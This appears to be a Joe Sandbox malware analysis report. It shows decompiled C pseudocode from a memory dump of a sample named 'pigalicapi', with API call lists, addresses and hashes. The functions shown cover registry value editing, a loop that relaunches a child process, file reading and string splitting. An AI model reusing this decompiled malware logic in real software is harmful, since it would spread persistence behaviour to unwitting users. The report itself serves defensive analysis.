                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                                          • Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                          • Instruction ID: 89e6ea7d5f7cd1f3b8914b5f239817843937aaeba4a6099ce7b548add1ef5737
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A317370A04249AFEF04CFD4D855BFFBBB9AB44704F14815CEA40B7281D7B96A00CBA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E04004AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                                                                                          						_t31 = E04008250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                                          						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                                          						_v16 = _t31;
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E040062B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                                          						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                                          						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x04004ac9
                                                                                                                                                                                                                                                                                          0x04004ad0
                                                                                                                                                                                                                                                                                          0x04004ad8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                                          0x04004ae5
                                                                                                                                                                                                                                                                                          0x04004b80
                                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                                          0x04004b08
                                                                                                                                                                                                                                                                                          0x04004b0e
                                                                                                                                                                                                                                                                                          0x04004b15
                                                                                                                                                                                                                                                                                          0x04004b32
                                                                                                                                                                                                                                                                                          0x04004b37
                                                                                                                                                                                                                                                                                          0x04004b3a
                                                                                                                                                                                                                                                                                          0x04004b44
                                                                                                                                                                                                                                                                                          0x04004b4e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004b58
                                                                                                                                                                                                                                                                                          0x04004b6b
                                                                                                                                                                                                                                                                                          0x04004b78
                                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                                          0x04004b96
                                                                                                                                                                                                                                                                                          0x04004b9b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004AD8
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 04004AF4
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(-0000000C), ref: 04004B08
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(-0000000C), ref: 04004B44
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04004B6B
                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004B78
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04004B85
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04004B90
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                          • Instruction ID: a8de0d0852ad7639ac4a8efdad63c4b5a832734fa442b81c8ae14f5e2abf7ac4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C213075A00208EFE704EF94D958FAEB7B9EB48305F10C658E605B7281D739EE84CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E040077B0(void** _a4) {
                                                                                                                                                                                                                                                                                          				void** _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				void** _v28;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          					_v12 = 0x96;
                                                                                                                                                                                                                                                                                          					_v16 = 0x1388;
                                                                                                                                                                                                                                                                                          					_v8 = _a4;
                                                                                                                                                                                                                                                                                          					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                                          							if(_t37 == 0) {
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                                          									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                                          									Sleep(0x7530);
                                                                                                                                                                                                                                                                                          									_t40 = E04002070( *_v8);
                                                                                                                                                                                                                                                                                          									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                                          									_v8[3] = _t40;
                                                                                                                                                                                                                                                                                          									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                                          										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                                          										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          											E04002510(_v8[3], 0x400e290);
                                                                                                                                                                                                                                                                                          											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L11;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                          									L11:
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                                          						_v28 = _v8;
                                                                                                                                                                                                                                                                                          						E040097C0(_v28);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x040077ba
                                                                                                                                                                                                                                                                                          0x040077c2
                                                                                                                                                                                                                                                                                          0x040077c8
                                                                                                                                                                                                                                                                                          0x040077cf
                                                                                                                                                                                                                                                                                          0x040077d9
                                                                                                                                                                                                                                                                                          0x040077e2
                                                                                                                                                                                                                                                                                          0x040077e8
                                                                                                                                                                                                                                                                                          0x040077ef
                                                                                                                                                                                                                                                                                          0x040077fc
                                                                                                                                                                                                                                                                                          0x0400780e
                                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                                          0x04007818
                                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                                          0x04007835
                                                                                                                                                                                                                                                                                          0x04007840
                                                                                                                                                                                                                                                                                          0x0400784c
                                                                                                                                                                                                                                                                                          0x04007851
                                                                                                                                                                                                                                                                                          0x04007857
                                                                                                                                                                                                                                                                                          0x04007861
                                                                                                                                                                                                                                                                                          0x0400786d
                                                                                                                                                                                                                                                                                          0x04007879
                                                                                                                                                                                                                                                                                          0x04007887
                                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007863
                                                                                                                                                                                                                                                                                          0x04007821
                                                                                                                                                                                                                                                                                          0x04007826
                                                                                                                                                                                                                                                                                          0x0400788f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007893
                                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                                          0x040078a5
                                                                                                                                                                                                                                                                                          0x040078ae
                                                                                                                                                                                                                                                                                          0x040078b5
                                                                                                                                                                                                                                                                                          0x040078ba
                                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                                          0x040078c8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 040077C2
                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 0400780E
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04007826
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 04007835
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04007840
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 040078A5
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040078BD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                                          • Instruction ID: 786529089a386be0191f5a1a0158813805cafbe076d78358bbe760b2cac44d20
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62318E74A00209EBFB54CF90C848BAEB7B1FB44305F14C668E905B7280D779BE40CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                                          					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t29;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                                          						if(_v16 > 0) {
                                                                                                                                                                                                                                                                                          							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          							_v20 = _t34;
                                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                                          								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                                          									_v8 = E040016F0(_v20, _v16);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x04005cd6
                                                                                                                                                                                                                                                                                          0x04005ce1
                                                                                                                                                                                                                                                                                          0x04005d10
                                                                                                                                                                                                                                                                                          0x04005d16
                                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                                          0x04005d2f
                                                                                                                                                                                                                                                                                          0x04005d36
                                                                                                                                                                                                                                                                                          0x04005d45
                                                                                                                                                                                                                                                                                          0x04005d4b
                                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                                          0x04005d54
                                                                                                                                                                                                                                                                                          0x04005d6d
                                                                                                                                                                                                                                                                                          0x04005d79
                                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                                          0x04005daf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 443218420-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                          • Instruction ID: 1c3b7df952a912c4f86c12ad70d9a091debb45511137cc5b62942badbf1a5776
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021EC75A00208FBEB64DFA4DC49BAE77B5EB48705F108659F615BB2C0C778AA80CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                                          				char* _v40;
                                                                                                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                          					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                          					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                                          					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                          						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                                                                                                                                          							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                          							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                                          					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t69;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                                          						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                          							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                          							if(_v40 != 0) {
                                                                                                                                                                                                                                                                                          								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                                          								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                                          								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          								 *_a12 = _v12;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                          							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                                          							if(_v44 != 0) {
                                                                                                                                                                                                                                                                                          								E04007B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                                          								 *_a16 = _v44;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x04005b56
                                                                                                                                                                                                                                                                                          0x04005b61
                                                                                                                                                                                                                                                                                          0x04005b85
                                                                                                                                                                                                                                                                                          0x04005b92
                                                                                                                                                                                                                                                                                          0x04005b95
                                                                                                                                                                                                                                                                                          0x04005b9c
                                                                                                                                                                                                                                                                                          0x04005ba3
                                                                                                                                                                                                                                                                                          0x04005bbc
                                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                                          0x04005bcb
                                                                                                                                                                                                                                                                                          0x04005bd7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005bde
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                                          0x04005be6
                                                                                                                                                                                                                                                                                          0x04005bf6
                                                                                                                                                                                                                                                                                          0x04005bfc
                                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                                          0x04005c09
                                                                                                                                                                                                                                                                                          0x04005c10
                                                                                                                                                                                                                                                                                          0x04005c17
                                                                                                                                                                                                                                                                                          0x04005c30
                                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                                          0x04005c59
                                                                                                                                                                                                                                                                                          0x04005c68
                                                                                                                                                                                                                                                                                          0x04005c71
                                                                                                                                                                                                                                                                                          0x04005c7a
                                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                                          0x04005ca4
                                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                                          0x04005cb9
                                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                                          0x04005ccf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B7F
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B8C
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005BB6
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005BF6
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005C2A
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04005C59
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005C9E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
